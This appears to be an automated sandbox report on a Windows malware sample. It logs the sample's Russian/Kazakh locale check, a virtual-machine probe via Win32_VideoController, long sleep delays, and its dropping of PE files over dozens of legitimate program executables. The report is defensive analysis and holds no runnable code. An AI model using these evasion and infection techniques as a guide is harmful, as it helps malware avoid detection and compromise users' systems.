                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Contains functionality to behave differently if execute on a Russian/Kazak computer
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_007252A0
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_009452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_009452A0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_022952A0
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 20CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 20FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 20D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 26770000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 269E0000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 26770000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 1E800000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 1ED40000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: 1E800000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifWindow / User API: threadDelayed 5124Jump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifWindow / User API: threadDelayed 4310Jump to behavior
                Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 484
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\vds.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\wbengine.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
